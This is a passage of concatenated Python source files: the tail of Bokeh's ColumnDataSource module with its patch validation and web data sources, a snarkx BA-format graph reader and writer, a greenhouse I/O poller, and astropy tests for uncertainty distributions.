'foo' : [ (slice(2), [11, 12]) ],
'bar' : [ (0, 101), (2, 301) ],
}
source.patch(patches)
After this operation, the value of the ``source.data`` will be:
.. code-block:: python
dict(foo=[11, 12, 30], bar=[101, 200, 301])
For a more comprehensive complete example, see :bokeh-tree:`examples/howto/patch_app.py`.
'''
import numpy as np
extra = set(patches.keys()) - set(self.data.keys())
if extra:
raise ValueError("Can only patch existing columns (extra: %s)" % ", ".join(sorted(extra)))
for name, patch in patches.items():
col_len = len(self.data[name])
for ind, value in patch:
# integer index, patch single value of 1d column
if isinstance(ind, int):
if ind > col_len or ind < 0:
raise ValueError("Out-of bounds index (%d) in patch for column: %s" % (ind, name))
# slice index, patch multiple values of 1d column
elif isinstance(ind, slice):
_check_slice(ind)
if ind.stop is not None and ind.stop > col_len:
raise ValueError("Out-of bounds slice index stop (%d) in patch for column: %s" % (ind.stop, name))
# multi-index, patch sub-regions of "n-d" column
elif isinstance(ind, (list, tuple)):
if len(ind) == 0:
raise ValueError("Empty (length zero) patch multi-index")
if len(ind) == 1:
raise ValueError("Patch multi-index must contain more than one subindex")
if not isinstance(ind[0], int):
raise ValueError("Initial patch sub-index may only be integer, got: %s" % ind[0])
if ind[0] > col_len or ind[0] < 0:
raise ValueError("Out-of bounds initial sub-index (%d) in patch for column: %s" % (ind, name))
if not isinstance(self.data[name][ind[0]], np.ndarray):
raise ValueError("Can only sub-patch into columns with NumPy array items")
if len(self.data[name][ind[0]].shape) != (len(ind)-1):
raise ValueError("Shape mismatch between patch slice and sliced data")
elif isinstance(ind[0], slice):
_check_slice(ind[0])
if ind[0].stop is not None and ind[0].stop > col_len:
raise ValueError("Out-of bounds initial slice sub-index stop (%d) in patch for column: %s" % (ind.stop, name))
# Note: bounds of sub-indices after the first are not checked!
for subind in ind[1:]:
if not isinstance(subind, (int, slice)):
raise ValueError("Invalid patch sub-index: %s" % subind)
if isinstance(subind, slice):
_check_slice(subind)
else:
raise ValueError("Invalid patch index: %s" % ind)
self.data._patch(self.document, self, patches, setter)
class CDSView(Model):
''' A view into a ``ColumnDataSource`` that represents a row-wise subset.
'''
filters = List(Instance(Filter), default=[], help="""
List of filters that the view comprises.
""")
source = Instance(ColumnarDataSource, help="""
The ``ColumnDataSource`` associated with this view. Used to determine
the length of the columns.
""")
class GeoJSONDataSource(ColumnarDataSource):
'''
'''
geojson = JSON(help="""
GeoJSON that contains features for plotting. Currently
``GeoJSONDataSource`` can only process a ``FeatureCollection`` or
``GeometryCollection``.
""")
@abstract
class WebSource(ColumnDataSource):
''' Base class for web column data sources that can update from data
URLs.
.. note::
This base class is typically not useful to instantiate on its own.
'''
adapter = Instance(CustomJS, help="""
A JavaScript callback to adapt raw JSON responses to Bokeh ``ColumnDataSource``
format.
If provided, this callback is executes immediately after the JSON data is
received, but before appending or replacing data in the data source. The
``CustomJS`` callback will receive the ``AjaxDataSource`` as ``cb_obj`` and
will receive the raw JSON response as ``cb_data.response``. The callback
code should return a ``data`` object suitable for a Bokeh ``ColumnDataSource``
(i.e. a mapping of string column names to arrays of data).
""")
max_size = Int(help="""
Maximum size of the data columns. If a new fetch would result in columns
larger than ``max_size``, then earlier data is dropped to make room.
""")
mode = Enum("replace", "append", help="""
Whether to append new data to existing data (up to ``max_size``), or to
replace existing data entirely.
""")
data_url = String(help="""
A URL to to fetch data from.
""")
@abstract
class RemoteSource(WebSource):
''' Base class for remote column data sources that can update from data
URLs at prescribed time intervals.
.. note::
This base class is typically not useful to instantiate on its own.
'''
polling_interval = Int(help="""
A polling interval (in milliseconds) for updating data source.
""")
class ServerSentDataSource(WebSource):
''' A data source that can populate columns by receiving server sent
events endpoints.
'''
class AjaxDataSource(RemoteSource):
''' A data source that can populate columns by making Ajax calls to REST
endpoints.
The ``AjaxDataSource`` can be especially useful if you want to make a
standalone document (i.e. not backed by the Bokeh server) that can still
dynamically update using an existing REST API.
The response from the REST API should match the ``.data`` property of a
standard ``ColumnDataSource``, i.e. a JSON dict that maps names to arrays
of values:
.. code-block:: python
{
'x' : [1, 2, 3, ...],
'y' : [9, 3, 2, ...]
}
Alternatively, if the REST API returns a different format, a ``CustomJS``
callback can be provided to convert the REST response into Bokeh format,
via the ``adapter`` property of this data source.
A full example can be seen at :bokeh-tree:`examples/howto/ajax_source.py`
'''
method = Enum('POST', 'GET', help="""
Specify the HTTP method to use for the Ajax request (GET or POST)
""")
if_modified = Bool(False, help="""
Whether to include an ``If-Modified-Since`` header in Ajax requests
to the server. If this header is supported by the server, then only
new data since the last request will be returned.
""")
content_type = String(default='application/json', help="""
Set the "contentType" parameter for the Ajax request.
""")
http_headers = Dict(String, String, help="""
Specify HTTP headers to set for the Ajax request.
Example:
.. code-block:: python
ajax_source.headers = { 'x-my-custom-header': 'some value' }
""")
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
def _check_slice(s):
if (s.start is not None and s.stop is not None and s.start > s.stop):
raise ValueError("Patch slices must have start < end, got %s" % s)
if (s.start is not None and s.start < 0) or \
(s.stop is not None and s.stop < 0) or \
(s.step is not None and s.step < 0):
raise ValueError("Patch slices must have non-negative (start, stop, step) values, got %s" % s)
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| |
from os.path import abspath, expanduser, isfile, dirname, isdir, basename, join, splitext
import networkx as nx
import re
import tempfile
from time import asctime
from snarkx.io import ParseFileError
__all__ = ['GraphReaderBA', 'GraphWriterBA']
class GraphReaderBA(object):
def __init__(self, path):
# print('DEBUG ReaderBA, file: {}'.format(path))
if path is None:
raise ValueError('`None` not allowed.')
self._filepath = abspath(expanduser(path))
if not isfile(self._filepath):
raise FileNotFoundError('`{}`'.format(self._filepath)) # ('File not found: `{}`'.format(self._filepath))
self._actual_index = -1 # actual index of the graph
self._stream = open(self._filepath, 'r', encoding='ascii') # graph file to be read
self._no_graphs = -1 # number of graphs in the catalogue
self._line_no = 0
try:
for _line in self._stream:
self._line_no += 1
_line = re.sub(r'\{.*\}', '', _line)
# FIXME: momentalne kompletne ignorujem citane metadata grafoveho suboru
_line = _line.strip()
if len(_line) == 0 or _line[0] == '#':
continue
# we got rid of remarks '{...}', one-line comments '#...', and metadata '{%... }'
# expecting one integer at the line
try:
found = [int(_num) for _num in re.findall(r'^\d+', _line)]
except ValueError:
self._stream.close()
raise ParseFileError('Parse error in `{0}` @ {1}'.format(self._filepath, self._line_no))
if len(found) == 1:
self._no_graphs = found[0]
break
else: # several integers @ line :: fault
self._stream.close()
raise ParseFileError('Syntax error `{0}` @ {1}'.format(self._filepath, self._line_no))
except UnicodeDecodeError:
raise IOError("File '{0}' not likely in `BA` format.".format(self._filepath))
@classmethod
def kind(cls):
return 'ba'
def close(self):
if hasattr(self, '_stream') and not self._stream.closed:
self._stream.close()
def __len__(self):
return self._no_graphs
def __del__(self):
self.close()
def __iter__(self):
self._actual_index = 1
self._last_read = 0
return self
def __next__(self):
_order = -1
_state = 1
_vertex_no = 0
_gph = nx.Graph()
if self._actual_index > self._no_graphs:
self._stream.close()
raise StopIteration
some_line_read = False
for _line in self._stream:
some_line_read = True
self._line_no += 1
_line = re.sub(r'\{.*\}', '', _line) # remove comments :: {}, including metadata comments
# TODO: deal with metadata, in format {% key : value }
_line = _line.strip()
if len(_line) == 0 or _line[0] == '#': # the former is deprecated, left for compatibility?
continue
if _state < 3: # expecting graph number or its order
try:
_found = [int(_num) for _num in re.findall(r'^\d+', _line)]
except ValueError:
self._stream.close()
raise ParseFileError('Parse error in `{0}` @ {1}'.format(self._filepath, self._line_no))
if len(_found) == 1:
if _state == 1:
if self._actual_index != _found[0]:
self._stream.close()
raise ParseFileError(
'Parse error (index) in `{0}` @ {1}'.format(self._filepath, self._line_no))
elif _state == 2:
_order = _found[0]
if _order < 1:
self._stream.close()
raise ParseFileError(
'Parse error (order) in `{0}` @ {1}'.format(self._filepath, self._line_no))
_gph.add_nodes_from(range(_order))
else:
self._stream.close()
raise RuntimeError('Oops!') # !!!!!! wtf
_state += 1
else:
self._stream.close()
raise ParseFileError(
'Data length mismatch at line {} @ {}'.format(self._line_no, self._filepath))
elif _state == 3:
try:
_found = [int(_num) for _num in re.findall(r'\d+', _line)]
except ValueError:
self._stream.close()
raise ParseFileError('Parse error in `{0}` @ {1}'.format(self._filepath, self._line_no))
for _v in _found:
if _v < 0 or _v >= _order:
raise ParseFileError(
'Unknown vertex at line {1} : {0}'.format(self._filepath, self._line_no))
if _v >= _vertex_no:
_gph.add_edge(_vertex_no, _v)
_vertex_no += 1
if _vertex_no == _order: # we read all vertices at the moment
break
if not some_line_read:
raise ParseFileError("File '{0}' not likely in `BA` format.".format(self._filepath))
self._last_read += 1
self._actual_index += 1
return _gph
# def actual_index(self):
# return self._actual_index
def last_read(self):
return self._last_read
def filename(self):
return self._filepath
def _nxgph_to_str(gph: nx.Graph):
_ret = ''
_vs = gph.nodes()
_ret += '{0}\n'.format(len(_vs))
for _v in _vs:
_ret += ' '.join(['{0}'.format(_vs.index(_u)) for _u in gph.neighbors_iter(_v)])
_ret += '\n'
return _ret
class GraphWriterBA(object):
_max_bound = 2 ** 15 - 1
@classmethod
def default_extension(self):
return '.ba'
def __init__(self, path: str, fbound=None):
if path is None:
raise TypeError('`None` not allowed for `path`.')
self._data_written = False
_dirname = dirname(abspath(path))
if not (isdir(_dirname)):
raise RuntimeError('Directory does not exist: {0}'.format(_dirname))
_filename = basename(abspath(path))
self._filename = join(_dirname, _filename)
# self._filename += '.ba'
if isdir(join(_dirname, _filename)):
raise RuntimeError('The directory: {0}'.format(self._filename))
# self._tstream = tempfile.TemporaryFile(mode='w+t', encoding='ascii')
self._buffer = []
if fbound is None or not (isinstance(fbound, int)) or not (0 <= fbound <= GraphWriterBA._max_bound):
self._fbound = GraphWriterBA._max_bound
else:
self._fbound = fbound
self._actual_graph = 0 # number of graphs written to temporary
self._part_no = 0 # archive part number
self._comments = []
def write(self, gph: nx.Graph, comment=None):
if self._actual_graph == self._fbound:
self._dump(cont=True)
# self._tstream = tempfile.TemporaryFile(mode='w+t', encoding='ascii')
self._buffer = []
self._actual_graph = 0
self._part_no += 1
self._actual_graph += 1
_bline = ''
# self._tstream.write('{0}\n'.format(self._actual_graph))
_bline += '{}\n'.format(self._actual_graph)
if not (comment is None):
if isinstance(comment, (list, tuple)):
for _elt in comment:
# self._tstream.write('{{ {0} }}\n'.format(_elt))
_bline += '{{ {0} }}\n'.format(_elt)
else:
# self._tstream.write('{{ {0} }}\n'.format(comment))
_bline += '{{ {0} }}\n'.format(comment)
# self._tstream.write('{0}'.format(_nxgph_to_str(gph)))
_bline += '{0}'.format(_nxgph_to_str(gph))
# self._tstream.flush()
self._buffer.append(_bline)
self._data_written = True
# def __enter__(self):
# return self
#
# def __exit__(self, exc_type, exc_val, exc_tb):
# self._dump()
def __del__(self):
self._dump()
def _dump(self, cont=False):
if cont or self._part_no > 0:
_ext_parts = splitext(self._filename)
_lfilename = '{0}.p{1}{2}'.format(_ext_parts[0], self._part_no, _ext_parts[1])
else:
_lfilename = self._filename
# if self._tstream and self._data_written:
if self._buffer and self._data_written:
try:
# self._tstream.seek(0)
rfile = open(_lfilename, 'w', encoding='ascii', newline='\r\n')
rfile.write('{{bagraph}}\n')
rfile.write('{{ Created on: {0} }}\n'.format(asctime()))
rfile.write('{0}\n'.format(self._actual_graph))
# for _line in self._tstream:
for _line in self._buffer:
rfile.write('{0}\n'.format(_line.strip()))
rfile.close()
except:
raise RuntimeError('Cannot write file: {0}'.format(self._filename))
finally:
# self._tstream.close()
# self._tstream = None
# del self._buffer[:]
self._buffer = list()
def close(self):
self._dump()
if __name__ == '__main__':
ipath = '~/_WORK_/_DEPRECATED_/snarkx-py/snarkx/resources/SKLAD'
opath = '.'
ofilename = 'vystup.txt'
ifilename = 'BICRIT.32'
reader = GraphReaderBA(ipath + '/' + ifilename)
writer = GraphWriterBA(opath + '/' + ofilename, 50)
gno = 0
for graph in reader:
gno += 1
print('Graph no {0} with order {1}'.format(gno, len(graph)))
writer.write(graph)
writer.close()
| |
from __future__ import absolute_import
import collections
import errno
import operator
import select
import sys
_original_select = select.select
class Poll(object):
"a greenhouse poller using the poll system call"
INMASK = getattr(select, 'POLLIN', 0)
OUTMASK = getattr(select, 'POLLOUT', 0)
ERRMASK = getattr(select, 'POLLERR', 0) | getattr(select, "POLLHUP", 0)
_POLLER = getattr(select, "poll", None)
def __init__(self):
self._poller = self._POLLER()
self._registry = collections.defaultdict(dict)
self._counter = 0
def register(self, fd, eventmask=None):
# integer file descriptor
fd = fd if isinstance(fd, int) else fd.fileno()
# mask nothing by default
if eventmask is None:
eventmask = self.INMASK | self.OUTMASK | self.ERRMASK
# get the current registrations dictionary
registrations = self._registry[fd]
registered = reduce(
operator.or_, registrations.itervalues(), 0)
# update registrations in the OS poller
self._update_registration(fd, registered, registered | eventmask)
# store the registration
self._counter += 1
registrations[self._counter] = eventmask
return self._counter
def unregister(self, fd, counter):
# integer file descriptor
fd = fd if isinstance(fd, int) else fd.fileno()
registrations = self._registry[fd]
# allow for extra noop calls
if counter not in registrations:
self._registry.pop(fd)
return
mask = registrations.pop(counter)
the_rest = reduce(operator.or_, registrations.itervalues(), 0)
# update the OS poller's registration
self._update_registration(fd, the_rest | mask, the_rest)
if not registrations:
self._registry.pop(fd)
def poll(self, timeout):
if timeout is not None:
timeout *= 1000
return self._poller.poll(timeout)
def _update_registration(self, fd, from_mask, to_mask):
if from_mask != to_mask:
if from_mask and to_mask:
self._poller.modify(fd, to_mask)
elif from_mask:
self._poller.unregister(fd)
elif to_mask:
self._poller.register(fd, to_mask)
def supports(self, fd):
if not isinstance(fd, int):
fd = fd.fileno()
try:
self._poller.register(fd)
except EnvironmentError:
return False
self._poller.unregister(fd)
return True
class Epoll(Poll):
"a greenhouse poller utilizing the 2.6+ stdlib's epoll support"
INMASK = getattr(select, 'EPOLLIN', 0)
OUTMASK = getattr(select, 'EPOLLOUT', 0)
ERRMASK = getattr(select, 'EPOLLERR', 0) | getattr(select, "EPOLLHUP", 0)
_POLLER = getattr(select, "epoll", None)
def poll(self, timeout):
if timeout is None:
timeout = -1
return self._poller.poll(timeout)
class KQueue(Poll):
"a greenhouse poller using the 2.6+ stdlib's kqueue support"
INMASK = 1
OUTMASK = 2
ERRMASK = 0
_POLLER = getattr(select, "kqueue", None)
_mask_map = {
getattr(select, "KQ_FILTER_READ", 0): INMASK,
getattr(select, "KQ_FILTER_WRITE", 0): OUTMASK,
}
def poll(self, timeout):
evs = self._poller.control(None, 2 * len(self._registry), timeout)
return [(ev.ident, self._mask_map[ev.filter]) for ev in evs]
def _update_registration(self, fd, from_mask, to_mask):
if from_mask == to_mask:
return
xor = from_mask ^ to_mask
to_add = to_mask & xor
to_drop = from_mask & xor
assert not to_add & to_drop # simple sanity
events = []
if to_add & self.INMASK:
events.append(select.kevent(
fd, select.KQ_FILTER_READ, select.KQ_EV_ADD))
elif to_drop & self.INMASK:
events.append(select.kevent(
fd, select.KQ_FILTER_READ, select.KQ_EV_DELETE))
if to_add & self.OUTMASK:
events.append(select.kevent(
fd, select.KQ_FILTER_WRITE, select.KQ_EV_ADD))
elif to_drop & self.OUTMASK:
events.append(select.kevent(
fd, select.KQ_FILTER_WRITE, select.KQ_EV_DELETE))
if events:
if sys.platform == 'darwin':
# busted OS X kqueue only accepts 1 kevent at a time
for event in events:
self._poller.control([event], 0)
else:
self._poller.control(events, 0)
class Select(object):
"a greenhouse poller using the select system call"
INMASK = 1
OUTMASK = 2
ERRMASK = 4
def __init__(self):
self._registry = collections.defaultdict(dict)
self._currentmasks = {}
self._counter = 0
def register(self, fd, eventmask=None):
# integer file descriptor
fd = fd if isinstance(fd, int) else fd.fileno()
# mask nothing by default
if eventmask is None:
eventmask = self.INMASK | self.OUTMASK | self.ERRMASK
# store the registration
self._counter += 1
self._registry[fd][self._counter] = eventmask
# update the full mask
self._currentmasks[fd] = self._currentmasks.get(fd, 0) | eventmask
return self._counter
def unregister(self, fd, counter):
# integer file descriptor
fd = fd if isinstance(fd, int) else fd.fileno()
# just drop it from the registrations dict
self._registry.get(fd, {}).pop(counter, None)
# rewrite the full mask
newmask = reduce(
operator.or_, self._registry[fd].itervalues(), 0)
if newmask:
self._currentmasks[fd] = newmask
else:
self._currentmasks.pop(fd, 0)
if not self._registry[fd]:
self._registry.pop(fd)
def poll(self, timeout):
rlist, wlist, xlist = [], [], []
for fd, eventmask in self._currentmasks.iteritems():
if eventmask & self.INMASK:
rlist.append(fd)
if eventmask & self.OUTMASK:
wlist.append(fd)
if eventmask & self.ERRMASK:
xlist.append(fd)
rlist, wlist, xlist = _original_select(rlist, wlist, xlist, timeout)
events = collections.defaultdict(int)
for fd in rlist:
events[fd] |= self.INMASK
for fd in wlist:
events[fd] |= self.OUTMASK
for fd in xlist:
events[fd] |= self.ERRMASK
return events.items()
def supports(self, fd):
# it might lie though
return True
def best():
if hasattr(select, 'epoll'):
return Epoll()
if hasattr(select, 'kqueue'):
return KQueue()
if hasattr(select, 'poll'):
return Poll()
return Select()
| |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
from numpy.testing import assert_array_equal
import pytest
from astropy import units as u
from astropy.coordinates import Angle
from astropy.uncertainty.core import Distribution
from astropy.uncertainty import distributions as ds
from astropy.utils import NumpyRNGContext
from astropy.tests.helper import assert_quantity_allclose
from astropy.utils.compat.optional_deps import HAS_SCIPY # noqa
if HAS_SCIPY:
from scipy.stats import norm # pylint: disable=W0611
SMAD_FACTOR = 1 / norm.ppf(0.75)
class TestInit:
@classmethod
def setup_class(self):
self.rates = np.array([1, 5, 30, 400])[:, np.newaxis]
self.parr = np.random.poisson(self.rates, (4, 1000))
self.parr_t = np.random.poisson(self.rates.squeeze(), (1000, 4))
def test_numpy_init(self):
# Test that we can initialize directly from a Numpy array
Distribution(self.parr)
def test_numpy_init_T(self):
Distribution(self.parr_t.T)
def test_quantity_init(self):
# Test that we can initialize directly from a Quantity
pq = self.parr << u.ct
pqd = Distribution(pq)
assert isinstance(pqd, u.Quantity)
assert isinstance(pqd, Distribution)
assert isinstance(pqd.value, Distribution)
assert_array_equal(pqd.value.distribution, self.parr)
def test_quantity_init_T(self):
# Test that we can initialize directly from a Quantity
pq = self.parr_t << u.ct
Distribution(pq.T)
def test_quantity_init_with_distribution(self):
# Test that we can initialize a Quantity from a Distribution.
pd = Distribution(self.parr)
qpd = pd << u.ct
assert isinstance(qpd, u.Quantity)
assert isinstance(qpd, Distribution)
assert qpd.unit == u.ct
assert_array_equal(qpd.value.distribution, pd.distribution.astype(float))
def test_init_scalar():
parr = np.random.poisson(np.array([1, 5, 30, 400])[:, np.newaxis],
(4, 1000))
with pytest.raises(TypeError) as exc:
Distribution(parr.ravel()[0])
assert exc.value.args[0] == "Attempted to initialize a Distribution with a scalar"
class TestDistributionStatistics():
def setup_class(self):
with NumpyRNGContext(12345):
self.data = np.random.normal(np.array([1, 2, 3, 4])[:, np.newaxis],
np.array([3, 2, 4, 5])[:, np.newaxis],
(4, 10000))
self.distr = Distribution(self.data * u.kpc)
def test_shape(self):
# Distribution shape
assert self.distr.shape == (4, )
assert self.distr.distribution.shape == (4, 10000)
def test_size(self):
# Total number of values
assert self.distr.size == 4
assert self.distr.distribution.size == 40000
def test_n_samples(self):
# Number of samples
assert self.distr.n_samples == 10000
def test_n_distr(self):
assert self.distr.shape == (4,)
def test_pdf_mean(self):
# Mean of each PDF
expected = np.mean(self.data, axis=-1) * self.distr.unit
pdf_mean = self.distr.pdf_mean()
assert_quantity_allclose(pdf_mean, expected)
assert_quantity_allclose(pdf_mean, [1, 2, 3, 4] * self.distr.unit, rtol=0.05)
# make sure the right type comes out - should be a Quantity because it's
# now a summary statistic
assert not isinstance(pdf_mean, Distribution)
assert isinstance(pdf_mean, u.Quantity)
# Check with out argument.
out = pdf_mean * 0.
pdf_mean2 = self.distr.pdf_mean(out=out)
assert pdf_mean2 is out
assert np.all(pdf_mean2 == pdf_mean)
def test_pdf_std(self):
# Standard deviation of each PDF
expected = np.std(self.data, axis=-1) * self.distr.unit
pdf_std = self.distr.pdf_std()
assert_quantity_allclose(pdf_std, expected)
assert_quantity_allclose(pdf_std, [3, 2, 4, 5] * self.distr.unit, rtol=0.05)
# make sure the right type comes out - should be a Quantity because it's
# now a summary statistic
assert not isinstance(pdf_std, Distribution)
assert isinstance(pdf_std, u.Quantity)
# Check with proper ddof, using out argument.
out = pdf_std * 0.
expected = np.std(self.data, axis=-1, ddof=1) * self.distr.unit
pdf_std2 = self.distr.pdf_std(ddof=1, out=out)
assert pdf_std2 is out
assert np.all(pdf_std2 == expected)
def test_pdf_var(self):
# Variance of each PDF
expected = np.var(self.data, axis=-1) * self.distr.unit**2
pdf_var = self.distr.pdf_var()
assert_quantity_allclose(pdf_var, expected)
assert_quantity_allclose(pdf_var, [9, 4, 16, 25] * self.distr.unit**2, rtol=0.1)
# make sure the right type comes out - should be a Quantity because it's
# now a summary statistic
assert not isinstance(pdf_var, Distribution)
assert isinstance(pdf_var, u.Quantity)
# Check with proper ddof, using out argument.
out = pdf_var * 0.
expected = np.var(self.data, axis=-1, ddof=1) * self.distr.unit**2
pdf_var2 = self.distr.pdf_var(ddof=1, out=out)
assert pdf_var2 is out
assert np.all(pdf_var2 == expected)
def test_pdf_median(self):
# Median of each PDF
expected = np.median(self.data, axis=-1) * self.distr.unit
pdf_median = self.distr.pdf_median()
assert_quantity_allclose(pdf_median, expected)
assert_quantity_allclose(pdf_median, [1, 2, 3, 4] * self.distr.unit, rtol=0.1)
# make sure the right type comes out - should be a Quantity because it's
# now a summary statistic
assert not isinstance(pdf_median, Distribution)
assert isinstance(pdf_median, u.Quantity)
# Check with out argument.
out = pdf_median * 0.
pdf_median2 = self.distr.pdf_median(out=out)
assert pdf_median2 is out
assert np.all(pdf_median2 == expected)
@pytest.mark.skipif(not HAS_SCIPY, reason='no scipy')
def test_pdf_mad_smad(self):
# Median absolute deviation of each PDF
median = np.median(self.data, axis=-1, keepdims=True)
expected = np.median(np.abs(self.data - median), axis=-1) * self.distr.unit
pdf_mad = self.distr.pdf_mad()
assert_quantity_allclose(pdf_mad, expected)
pdf_smad = self.distr.pdf_smad()
assert_quantity_allclose(pdf_smad, pdf_mad * SMAD_FACTOR, rtol=1e-5)
assert_quantity_allclose(pdf_smad, [3, 2, 4, 5] * self.distr.unit, rtol=0.05)
# make sure the right type comes out - should be a Quantity because it's
# now a summary statistic
assert not isinstance(pdf_mad, Distribution)
assert isinstance(pdf_mad, u.Quantity)
assert not isinstance(pdf_smad, Distribution)
assert isinstance(pdf_smad, u.Quantity)
# Check out argument for smad (which checks mad too).
out = pdf_smad * 0.
pdf_smad2 = self.distr.pdf_smad(out=out)
assert pdf_smad2 is out
assert np.all(pdf_smad2 == pdf_smad)
def test_percentile(self):
expected = np.percentile(self.data, [10, 50, 90], axis=-1) * self.distr.unit
percs = self.distr.pdf_percentiles([10, 50, 90])
assert_quantity_allclose(percs, expected)
assert percs.shape == (3, 4)
# make sure the right type comes out - should be a Quantity because it's
# now a summary statistic
assert not isinstance(percs, Distribution)
assert isinstance(percs, u.Quantity)
def test_add_quantity(self):
distrplus = self.distr + [2000, 0, 0, 500] * u.pc
expected = (np.median(self.data, axis=-1) + np.array([2, 0, 0, 0.5])) * self.distr.unit
assert_quantity_allclose(distrplus.pdf_median(), expected)
expected = np.var(self.data, axis=-1) * self.distr.unit**2
assert_quantity_allclose(distrplus.pdf_var(), expected)
def test_add_distribution(self):
another_data = (np.random.randn(4, 10000)
* np.array([1000, .01, 80, 10])[:, np.newaxis]
+ np.array([2000, 0, 0, 500])[:, np.newaxis])
# another_data is in pc, but main distr is in kpc
another_distr = Distribution(another_data * u.pc)
combined_distr = self.distr + another_distr
expected = np.median(self.data + another_data/1000,
axis=-1) * self.distr.unit
assert_quantity_allclose(combined_distr.pdf_median(), expected)
expected = np.var(self.data + another_data/1000, axis=-1) * self.distr.unit**2
assert_quantity_allclose(combined_distr.pdf_var(), expected)
def test_helper_normal_samples():
centerq = [1, 5, 30, 400] * u.kpc
with NumpyRNGContext(12345):
n_dist = ds.normal(centerq, std=[0.2, 1.5, 4, 1]*u.kpc, n_samples=100)
assert n_dist.distribution.shape == (4, 100)
assert n_dist.shape == (4, )
assert n_dist.unit == u.kpc
assert np.all(n_dist.pdf_std() > 100*u.pc)
n_dist2 = ds.normal(centerq, std=[0.2, 1.5, 4, 1]*u.pc, n_samples=20000)
assert n_dist2.distribution.shape == (4, 20000)
assert n_dist2.shape == (4, )
assert n_dist2.unit == u.kpc
assert np.all(n_dist2.pdf_std() < 100*u.pc)
def test_helper_poisson_samples():
centerqcounts = [1, 5, 30, 400] * u.count
with NumpyRNGContext(12345):
p_dist = ds.poisson(centerqcounts, n_samples=100)
assert p_dist.shape == (4,)
assert p_dist.distribution.shape == (4, 100)
assert p_dist.unit == u.count
p_min = np.min(p_dist)
assert isinstance(p_min, Distribution)
assert p_min.shape == ()
assert np.all(p_min >= 0)
assert np.all(np.abs(p_dist.pdf_mean() - centerqcounts) < centerqcounts)
def test_helper_uniform_samples():
udist = ds.uniform(lower=[1, 2]*u.kpc, upper=[3, 4]*u.kpc, n_samples=1000)
assert udist.shape == (2, )
assert udist.distribution.shape == (2, 1000)
assert np.all(np.min(udist.distribution, axis=-1) > [1, 2]*u.kpc)
assert np.all(np.max(udist.distribution, axis=-1) < [3, 4]*u.kpc)
# try the alternative creator
udist = ds.uniform(center=[1, 3, 2] * u.pc, width=[5, 4, 3] * u.pc, n_samples=1000)
assert udist.shape == (3, )
assert udist.distribution.shape == (3, 1000)
assert np.all(np.min(udist.distribution, axis=-1) > [-1.5, 1, 0.5]*u.pc)
assert np.all(np.max(udist.distribution, axis=-1) < [3.5, 5, 3.5]*u.pc)
def test_helper_normal_exact():
pytest.skip('distribution stretch goal not yet implemented')
centerq = [1, 5, 30, 400] * u.kpc
ds.normal(centerq, std=[0.2, 1.5, 4, 1]*u.kpc)
ds.normal(centerq, var=[0.04, 2.25, 16, 1]*u.kpc**2)
ds.normal(centerq, ivar=[25, 0.44444444, 0.625, 1]*u.kpc**-2)
def test_helper_poisson_exact():
pytest.skip('distribution stretch goal not yet implemented')
centerq = [1, 5, 30, 400] * u.one
ds.poisson(centerq, n_samples=1000)
with pytest.raises(u.UnitsError) as exc:
centerq = [1, 5, 30, 400] * u.kpc
ds.poisson(centerq, n_samples=1000)
assert exc.value.args[0] == ("Poisson distribution can only be computed "
"for dimensionless quantities")
def test_reprs():
darr = np.arange(30).reshape(3, 10)
distr = Distribution(darr * u.kpc)
assert 'n_samples=10' in repr(distr)
assert 'n_samples=10' in str(distr)
assert r'n_{\rm samp}=10' in distr._repr_latex_()
@pytest.mark.parametrize("func, kws", [
(ds.normal, {'center': 0, 'std': 2}),
(ds.uniform, {'lower': 0, 'upper': 2}),
(ds.poisson, {'center': 2}),
(ds.normal, {'center': 0*u.count, 'std': 2*u.count}),
(ds.uniform, {'lower': 0*u.count, 'upper': 2*u.count}),
(ds.poisson, {'center': 2*u.count})
])
def test_wrong_kw_fails(func, kws):
with pytest.raises(Exception):
kw_temp = kws.copy()
kw_temp['n_sample'] = 100 # note the missing "s"
assert func(**kw_temp).n_samples == 100
kw_temp = kws.copy()
kw_temp['n_samples'] = 100
assert func(**kw_temp).n_samples == 100
def test_index_assignment_quantity():
arr = np.random.randn(2, 1000)
distr = Distribution(arr*u.kpc)
d1q, d2q = distr
assert isinstance(d1q, Distribution)
assert isinstance(d2q, Distribution)
ndistr = ds.normal(center=[1, 2]*u.kpc, std=[3, 4]*u.kpc, n_samples=1000)
n1, n2 = ndistr
assert isinstance(n1, ds.Distribution)
assert isinstance(n2, ds.Distribution)
def test_index_assignment_array():
arr = np.random.randn(2, 1000)
distr = Distribution(arr)
d1a, d2a = distr
assert isinstance(d1a, Distribution)
assert isinstance(d2a, Distribution)
ndistr = ds.normal(center=[1, 2], std=[3, 4], n_samples=1000)
n1, n2 = ndistr
assert isinstance(n1, ds.Distribution)
assert isinstance(n2, ds.Distribution)
def test_histogram():
arr = np.random.randn(2, 3, 1000)
distr = Distribution(arr)
hist, bins = distr.pdf_histogram(bins=10)
assert hist.shape == (2, 3, 10)
assert bins.shape == (2, 3, 11)
def test_array_repr_latex():
# as of this writing ndarray does not have a _repr_latex_, and this test
# ensure distributions account for that. However, if in the future ndarray
# gets a _repr_latex_, we can skip this.
arr = np.random.randn(4, 1000)
if hasattr(arr, '_repr_latex_'):
pytest.skip('in this version of numpy, ndarray has a _repr_latex_')
distr = Distribution(arr)
assert distr._repr_latex_() is None
def test_distr_to():
distr = ds.normal(10*u.cm, n_samples=100, std=1*u.cm)
todistr = distr.to(u.m)
assert_quantity_allclose(distr.pdf_mean().to(u.m), todistr.pdf_mean())
def test_distr_noq_to():
# this is an array distribution not a quantity
distr = ds.normal(10, n_samples=100, std=1)
with pytest.raises(AttributeError):
distr.to(u.m)
def test_distr_to_value():
distr = ds.normal(10*u.cm, n_samples=100, std=1*u.cm)
tovdistr = distr.to_value(u.m)
assert np.allclose(distr.pdf_mean().to_value(u.m), tovdistr.pdf_mean())
def test_distr_noq_to_value():
distr = ds.normal(10, n_samples=100, std=1)
with pytest.raises(AttributeError):
distr.to_value(u.m)
def test_distr_angle():
# Check that Quantity subclasses decay to Quantity appropriately.
distr = Distribution([2., 3., 4.])
ad = Angle(distr, 'deg')
ad_plus_ad = ad + ad
assert isinstance(ad_plus_ad, Angle)
assert isinstance(ad_plus_ad, Distribution)
ad_times_ad = ad * ad
assert not isinstance(ad_times_ad, Angle)
assert isinstance(ad_times_ad, u.Quantity)
